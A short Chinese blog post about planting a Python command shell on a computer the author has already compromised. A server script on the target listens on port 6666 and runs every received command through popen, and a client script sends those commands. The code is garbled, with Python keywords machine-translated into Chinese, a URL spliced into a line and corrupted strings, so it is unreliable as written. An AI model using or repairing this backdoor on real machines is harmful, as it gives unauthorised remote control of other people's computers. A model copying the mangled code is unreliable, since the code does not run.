有的时候我们在获取到目标电脑时候如果对方电脑又python编译环境时可以利用python反弹外壳
主要用操作系统到python库和sokect库
这里的服务端在目标机上运行
从套接字进口* 从操作系统导入* s=插座(AF_INET SOCK_STREAM) # IVP4寻址tcp协议 s.bind(", 6666) #补丁端口 s.listen(1) #开始监听一个队列 而真正的: 袜子,addr=s.accept() #返回两次第一次返回连接地址二端口号 打印(“客户端:“,addr) 而真正的: cmd=sock.recv(1024) #缓存长度接收传递过来 cmdstr=cmd.decode () 如果cmdstr==巴顺觥? 打印(“客户端:“,addr,“关闭”) sock.close () 打破 结果=popen (cmdstr) .read () sock.send (result.encode ()) s.close ()
本机运行
从套接字进口* 从操作系统导入* c=插座(AF_INET SOCK_STREAM) # IVP4寻址tcp协议 c.connect((127.0.0.1, 6666)) #连接地址 而真正的: cmd=输入(cmd:) c.send (cmd.encode()) #必须传递流 如果cmd==巴顺觥? c.close () 打破 data=https://www.yisu.com/zixun/c.recv (1014) print (data.decode ())
以上所述是小编给大家介绍的python模拟菜刀反弹外壳绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留的言,小编会及时回复大家的!